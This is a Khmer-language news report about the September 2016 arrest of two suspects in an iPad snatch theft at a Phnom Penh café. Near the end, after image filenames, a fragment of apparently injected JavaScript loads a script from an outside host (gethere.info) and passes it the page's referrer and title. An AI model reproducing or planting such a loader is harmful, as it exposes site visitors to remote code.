យកiPad រត់គេចត្រូវនគរបាលខណ្ឌឫស្សីកែវ សហការជាមួយប៉ុស្តិ៍ទួលសង្កែឃាត់ខ្លួនបាន២នាក់ក្នុងចំណោមបក្សពួក

ភ្នំពេញៈ ជនសង្ស័យ ០៣នាក់ក្នុងចំណោមបក្សពួក ០៣នាក់ ត្រូវបានកម្លាំងសមត្ថកិច្ចព្រហ្មទណ្ឌខណ្ឌ

សហការជាមួយកម្លាំងសមត្ថកិច្ចប៉ុស្តិ៍ទួលសង្កែ បានធ្វើការបង្ក្រាបឃាត់ខ្លួន កាលពីវេលាម៉ោង៨និង៣០នាទីយប់ ថ្ងៃទី០៨ ខែកញ្ញា ឆ្នាំ២០១៦ ដែលស្ថិតនៅក្នុងហាងកាហ្វេយីហោ (ស្រីខួច) ផ្លូវលេខ៧០ ក្រុម៩ ភូមិទួលសង្កែ សង្កាត់ទួលសង្កែ ខណ្ឌឫស្សីកែវ រាជធានីភ្នំពេញ ។

លោក ហ៊ុយ ហ៊ាន នាយប៉ុស្តិ៍នគរបាលទួលសង្កែ បានឲ្យដឹងថា នៅមុនពេលកើត ជនរងគ្រោះបានអង្គុយផឹកកាហ្វេក្នុងហាងយីហោ (ស្រីខួច) ហើយចុច អាយផេត លេងហ្វេកប៊ុក ស្រាប់តែមានជនសង្ស័យម្នាក់ឈ្មោះ អាថា ហើយនិងបក្សពួក ០២នាក់ទៀតឈ្មោះ អាលី និងអាទ្រេន បាននាំគ្នាធ្វើសកម្មភាពឆក់យក អាយផេត ពីដៃជនរងគ្រោះ ហើយរត់តាមផ្លូវរថភ្លើង ពេលនោះ ជនរងគ្រោះបានស្រែកផ្អើលឆោឡោថា ចោរៗ ភ្លាមៗនោះ ក៏ត្រូវបានកម្លាំងសមត្ថកិច្ចជិះល្បាតតាមផ្លូវនោះ បានជួយអន្តរាគមន៍ និងឃាត់ខ្លួនបានជនសង្ស័យម្នាក់ឈ្មោះ អាលី ដែលជាជនដៃដល់ និងជនសង្ស័យម្នាក់ឈ្មោះ អាថា ត្រូវបានសមត្ថកិច្ចឃាត់ខ្លួន រឺឯបក្សពួកម្នាក់ទៀតឈ្មោះ អាទ្រេន បានរត់គេចខ្លួនបាត់ ។ ហើយកម្លាំងសមត្ថកិច្ចយើង បាននាំខ្លួនជនសង្ស័យទាំង ០២នាក់មកប៉ុស្តិ៍នគរបាលរដ្ឋបាលទួលសង្កែ ដើម្បីធ្វើការសួរនាំ ។

លោកបានបន្តទៀតថា ជនសង្ស័យដែលកម្លាំងសមត្ថកិច្ចយើងឃាត់ខ្លួននោះ ទី១ មានឈ្មោះ ឆិល គីមលី ភេទប្រុស អាយុ ១៨ឆ្នាំ ជនជាតិខ្មែរ មុខរបរ មិនពិតប្រាកដ ស្នាក់នៅផ្ទះលេខ៨៣ ផ្លូវលេខ៩៣ សង្កាត់ស្រះចក ខណ្ឌដូនពេញ, ទី២ មានឈ្មោះ ចាន់ សុថា ភេទប្រុស អាយុ ១៨ឆ្នាំ ជនជាតិខ្មែរ មុខរបរ មិនពិតប្រាកដ ស្នាក់ផ្ទះជួល ផ្លូវរថភ្លើង ភូមិទួលគោក សង្កាត់ទួលសង្កែ ខណ្ឌឫស្សីកែវ និងទី៣ មានឈ្មោះ ហៅត្រេន ភេទប្រុស អាយុ ២៦ឆ្នាំ មុខរបរ មិនពិតប្រាកដ (បានរត់គេចខ្លួន) ។ ចំណែកឯជនរងគ្រោះមានឈ្មោះ រស់ ឌី ភេទប្រុស អាយុ ២៨ឆ្នាំ ស្នាក់នៅផ្ទះលេខ០៥៩អ៊ី ផ្លូវរថភ្លើង ក្រុម១ ភូមិបាក់ទូក សង្កាត់ទួលសង្កែ ខណ្ឌឫស្សីកែវ សំភារៈដែលត្រូវក្រុមចោរឆក់នោះ អាយផេត មួយគ្រឿង ។

បច្ចុប្បន្នជនសង្ស័យទាំង ០២នាក់ខាងលើ ត្រូវបានកម្លាំងសមត្ថកិច្ចបញ្ជូនខ្លួនទៅឃុំជាបណ្តោះអាសន្ននៅអធិការដ្ឋាននគរបាលខណ្ឌឫស្សីកែវ ដើម្បីកសាងសំណុំរឿង បញ្ជូនទៅកាន់តុលាការចាត់ការតាមនីតិវិធីច្បាប់ ៕ដោយ៖ ស៊ុនតិចimg-20160909-wa0037 img-20160909-wa0036s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More